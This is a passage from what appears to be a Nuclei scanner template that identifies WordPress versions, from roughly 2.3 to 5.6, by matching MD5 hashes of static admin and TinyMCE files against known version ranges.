"(\"073d4e2e9dce085364cba7b11dcafa8b\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"a3dbce149457e880a29693684cecd425\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"8be2b9d1eeaaeb053236de49c0b3efcd\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"8ad8833b60497ab34c3df89ca124785d\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"1cd09416a8c94906605e085b32a00d20\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"bfb602edbb43601f02ce23ae875d3976\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"5d6d79bf1a1df7daffd0f4f5844cebb9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"7314d06c13a9db49cb81aadf88441ce7\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"a9e98570b0d4b719f968de907dbebc1e\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"4d7f7857bc064daeb85cad30ff0feeab\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"91253f7e866f844f0bd47a0630a3d30f\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"a8720b36ac7c97fe0d3fee37b081c316\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/modern/theme.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"75c97923eb04944e60b3659633f6fc8f\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"020976230a9fcdc90ebc06144dcb9865\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"e3b7cec28cad5caa5fcbcc2a15cebae7\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"d078eb835693e2b90baa5522cc807ec1\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"506dd1713e3fc6ed3de0c00867c4dfaa\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"73e129875cecb80849c9d37a223e48b6\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"a9c521859ff01e0528336828800db2cf\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"d0d8223ac24917740b2f0f2423bf3410\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"564c5df5e7f98ae88d546732251aeab2\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"2ad1417fd25d61b5feb5e18cd3be2494\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"03e3c162d0ca7ec600d185c193234660\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"5eaa758e147eb8c84507d2671cb0eb3a\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"7a36834309f0b8ef510bccb53d832943\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"af3b295e3eed46ece77323d00021090b\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"6ffeeca19829c98e1da5d5496fe415db\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"ee75ddd3e6a9b205b105d05e9dac72d1\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"558edbf6c845c9c87cd268285a0666b3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/modern/theme.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"caacfdd9b26dbae208eef5381e753eea\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"e873cd5a3ac205304d4f48b8d106aa35\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"d502a6ac28bb48a7d91a89ba9b5710c0\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"0de9115a54b3867ca975c9f1bff8225c\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"48e1bb77c2ec2cdbb321e12a95fdf425\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"3da8f8fb91d3c79f2cd499944aa42737\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"7b4a867a84575f7d26a9377b1eae7cbf\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"76569bb2afef83f696d146f1515d7308\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"3cda8e27d12c73c9046250803b1153e0\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"2f8cf087f0fd2648120054fde841f7cb\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"997db40f21c0f2249e96aad261d2db65\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"fb330860e2aff1f458e129ba84ea1fbb\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"0cd9fdee0a27d28e107936ef56e4e24f\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"0e50bcfc23e66938c5585ce303105cf2\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"94a15198144af9962df61ed927e23f1b\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"148b19d02f928ae66fed91adb39f66c9\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"efb528339d6fde55ea32c59d558a3299\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"a649bd59c1d607b782a38ab372f20ca3\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"38d2137a5518e2bc7a88b4bf35c4ffca\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"69a65927466dab834f5d48c28c8c23bb\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"64239ce0c6d44c0eaf09e6fd5ba672c2\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"733e85bf06990e86e4892d75759eae1b\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"1d72974d4431f1558f0be213ecf4b3f6\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"6ad28c2bb29efea8d198bab7e5354439\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"d41da4c3b9d07e54055ad9ab13b9112b\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"4bcf636bad04e64f10be7003828c210e\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f0293e817c1dae4b042a1a1d6248b007\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"720418167ced7d4e1633fb64ba3d390f\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"dadc44587098d38d2ad483eb1d828212\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"b48d16a6a96856b9d1404cdef5240187\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"3986deb1875d68d2ddc2ca9480c43467\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"190f98d73b8e7550e7ec69370bf48b6b\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"1216bf3c90d1540a8d29e04f6f9bb7b2\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"145af6e3a2d9bfaf7010373f2ba3d835\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"079d5fa2e5111e6f0a10ed6cbf7d9b80\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"6bd86bdfb5a42cb4d94163433ba74269\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"645805aedb03bd9f95a5f37ad286d6ab\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"321d572f5f98e1c84a6ec1775dc3ee69\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"89dcd2e2ea2dd86abe9c00761b806a9c\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"6a65f345c92e1b3b2c52e323a739a03f\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"695f70d7e94e32459d78ab796a88ab4b\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"b1b633c181b3995b1702d6db1154e37c\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"e5554fe0fe4861016f210fcb3ba9de9c\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"8510f4975434100288bc363aaba2eaae\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"afc4c67509b5f5b52fd2b7556836b69c\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"ba5c8a35df3adc61f0c8abccd371c3fd\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"1e031c368742554084b13814a53c6261\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"90cc2e0760fa019d3429b601550c6430\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"b670d225181c91289ac6efb9809905d7\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"15ba49042f9c3070d2bc14798cbaa63d\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"f0d5f3037d3ef1d652c2a565ef67ecf1\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"b6f7e5f622295267ff78823f687e67ab\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"611310a2b7739d0e073cb88153237131\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"dcdd5a844af0f8e806e007c3890ba954\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"0a025aad30fc446433312fbfd7b41bde\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"6d4e3950e0b34d1b188c3c49a5604f00\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"eb5ecbdece73d7b68b0c7bb0fbde8932\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"b068d94458289ccfca5221fe750b4155\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"900194f71ef56cb47d027a61ed75c1c9\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"b15b0fedf40436964822d4c225e36bdb\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"2003f5361b31565d518006c48b649801\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"e729f9f1201575a9589363bcf7438cb0\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a3befc9aed67d0169c87284c6c1a95e4\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"4c19cd169dac570c6d6675fa82a4f3e5\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"d88ec9908ef4412275ccff68861a41c7\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7ac22f7e2e534de4364c1de8351b175c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"54b12794da9f72eba7a1b7c742eef081\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"fb80dbf401770e6d2f8513cda0adb393\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"44b8f527be46fc591c55a1ef4e4c5781\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.4.4 - dsl: - - "(\"111e5c52d4d0f2d41fc16f65884954bc\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"36ce270b0231ea5adefe919ec2661b20\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"a1f2c45f38a2581ec28d2f41f835a1a2\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"5ef80c55f07303af4e086692f247c1e9\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"0966da48749b6e089014a3782c329999\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"a75702d3522680cc2d408736ce18eec4\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"e54ed18bea6c2c6ae2fd1909987d2416\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"2a92c5eb43f95da660c4c58dc1aa2501\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"abba483f4f8fd4d1bb3883dfdbde63b9\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"1b56d9b064a6f1768301a2a33affd140\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"117eed22aeeccaa7a85ad2c2a5760a01\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"ca4167ce1c99086ae6f3155af8728d49\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"e1d4bfb8b0e0016a1a18599fefb5989e\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"537cacc621649c9c258110c56fd8d230\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"611679cf46c9710355e58818e6c9937f\" == md5(body))" - - type: dsl - name: 5.1 - 5.4.4 - dsl: - - "(\"077519f391906aea6aa945761a290b3b\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"df032317402cd90b340e016447bad44d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/login.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"7518e2cdcfd5de19abc14cd014d073e7\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"e98aa1f1d14fd4fd2b80d456948b6262\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"01007fd412c09c53accf6b0e89f4477b\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3f92632d9d94229a2f95af15593a8031\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"8e833f06a27688ee35e373d1cc7f2afc\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"61fcf1005a8af792f340f449f6a2c988\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"0e01b8fa9ea4487455a587c852b405c5\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"479122b088e353c76479d24bf10e7f27\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"25d100e4f308bdf6a25f51023529e0cb\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"e07ad8ce23db15420e3787dc08d415b0\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"af561b86efcd3c53a91ab4070b2c5bc4\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"02d549e3f066d130a5c6346d00529df5\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"5ee5919f129c64659aa586f39de0c9cc\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"bc30b85daead7b9e041fd7ec7d90700f\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"f760faa8361214a1830732827a566ff2\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"c6f1a4e8396191754e8043b78cc6e8b1\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"27a64401a3200b4df27feac7ac42a058\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"35913878f077f01b45a8d78abd2edacc\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"24fe47e6b276803d71f1ca40da9bbbfd\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"172dda34727301b786a0037bf6acf0af\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"9196f060238471f88c7afbd5ea4aaf08\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"debd3712345e6826f3c09830377622d4\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"59d610420f74a3c7b3c61ba3fb9456af\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"74eeb188296b161860ba9dbc08f57c54\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"100ac6af835f353443384ea8a4da1da7\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"5bf25641c9170715b0b6796baa9a708b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/edit-comments.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"c9df035a5e3a22ed64ecbd389a442071\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"eabcc0c5e7d7a437b614fab4089a6810\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"f4d14807fae2e4f1be7f50934c4fe5c3\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"f68bc4e612b9b4887eca532e66687af4\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"302689cda1abde975e19e1230b455d29\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"e7e22b2197cc81ee0c5cf30460ede00f\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f6947b28c386e3637c99d199c4a32a33\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"5a9fd1c52b9007ab3d2afbaa6f2dcf64\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"21cddaeefcf4085a03cb0279e3fa26be\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"fa6c396401a13d727d17409a38d3476e\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"88669276cac6721f2c39e4c7b09d9153\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"4447511c25d642d258d7b46cfd4ccf8d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"4914c94a70fd5312d9f81037fd0143c3\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"7973341a787dfbee1b28a142be984a56\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"35c58396b20acee076ea01c9bf7e5663\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"31cbb52c961abeebfd37ab959b5547b5\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"23d3d79737a0fab3785a92caa7e55862\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"501d2e3f75455c53e270bcae6c0446ed\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"f1fb0174b531476f287709b0b9a523e3\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"cea7fcad6f59dceb354ea33628d67926\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"20ec1fe07984f6ada0845df97eb73a86\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"1d53ac0e3f5a8e83d97380b1b01cb19b\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"8b98dc81013e5510adde5c9280c410b6\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"a975fc736cdecddbfb9aed80699fb3af\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"62a823564a6191f21e412a42bda1e729\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"9a69064e1e7557587181bed581f88a4b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"908f23515f075ea7d164a713282989ef\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b81e08e13f223a62c250a6140be14e4b\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"2ef07d05d7aca6002e56cfbb39b73598\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/install-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"97e4d5c63a4bd3a4f073bba5dcab8ca6\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"7b493359000b7f086c19ac7dfec440a8\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"4a1bb49f35a84d27dc162b7a72c6d15d\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"bfb464d0c31eb556a824623537b0da3b\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"48140068d8f15c150fee36f905cd98f8\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"e3e8c235f96ea51104cde0104ae12010\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"f2197bc5fffd870815d914eccf767eb3\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"9ac5bd4bfdda52b4b9ed21f7f4ba23d8\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"48b3c809ddef2ab9a492a5797cae8087\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"3ed251ebb3fa879221a7ddaac4374a7b\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"35593db173c2dfce8b63f1a39f2eb3b7\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"0b2751d087519eff48ee76fa78a70961\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"fd0ebb2e5cb4a51dbd122659f4e88042\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"96bd054cdcf2aae77955a0d3d4654225\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"e896d069f831a48adac9fc01b74bfd84\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"a9bd89b5b0dfa63cd42cb75833ff3a3f\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"ecf3a0a1090fd8efb7c2a10e38a9a7f4\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.4.4 - dsl: - - "(\"2bd6b9c1287ded9ed1e668959385119b\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"36065a28a39ea8533cf109bd86343f85\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/install.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"e95806e74d09390abc3dc7b8094cdeea\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"f651508c7103eca79f012b62fa6a5193\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6306b90e2dc9778074653d97c72d1162\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"572e9e2e3d23c7b899a505bb16d5131a\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"06874217e7bf290a096fc10fc90a9a52\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"333fb17a509abf264fd13c529939608b\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"9fa7dcf54586c1d680cea67b449ffd88\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a36308e272c9fbdbbd911ddaf399ba0b\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"58e017c07fbd95848ec5c98a4e182e85\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"f17819c6cfe216f51260cc6621439cc5\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"de9a85a063de74e38a9fd4cb41c2b0ce\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"873132014ec1c1918ee9fbc06e0de909\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"e4ed9e62c29a97ef0bcd2776b2403f3b\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"8bcad96ceb3df102985a7c59610548cd\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"4423dc9caa273de00b935fb0995270fb\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"0129db65db4c33e5a0449daf4ab89757\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"5fd8e3fbdecefd95081fcc49edef3e42\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"3a5c1eb7dd2e56931bb9757ddf31bce6\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"9be959e6bdbfb8d2cb06af706406265c\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.4.4 - dsl: - - "(\"c1896d0a1d14cd707999a253d37ecc5f\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"fec5f52b672c4c9c1be7699a5ee9fcac\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-lists.js" - matchers: - - type: dsl - name: 4.7 - 5.0.11 - dsl: - - "(\"a3ad4f080bd61da2b9f2f9390b1533d1\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"4b92734b4cccad235747a460a76ef528\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"99849a20c182bbc6ed8c6aa3fc241f8c\" == md5(body))" - - type: dsl - name: 3.9 - 4.4.24 - dsl: - - "(\"c54ced2e822b232f2ad8a5f34930386f\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"f20cbb755614c908fd94d4f1996c1fee\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"c7fa747b3e84baea1545a375324c6d12\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"87ce7e6067f829ba65df86fddb32bf5b\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"46e1341cd4ea49f31046f7d7962adc7f\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.1 - dsl: - - "(\"f6ac8cbe225dfa6187ce56623e038faf\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"24ec3750dc03ef23cfea6293dd820779\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"3f1815338eff901c71d41eeac40e23a9\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"2dfd550d6f8fc069af07cbc3464f152a\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"6ebbd5ec178efc75ad50c9687a8fe39a\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"2415f11a68f436ce1b0a7de8fc59cae8\" == md5(body))" - - type: dsl - name: 2.5.1 - 2.6 - dsl: - - "(\"15fc925fd39bb496871e842b2a754c76\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"3f3d922461418335261f26c4f97931c1\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"cd817551314bafab7fcbee0bac282570\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"56404e3a0d0cf24460ddf0604524c77c\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - 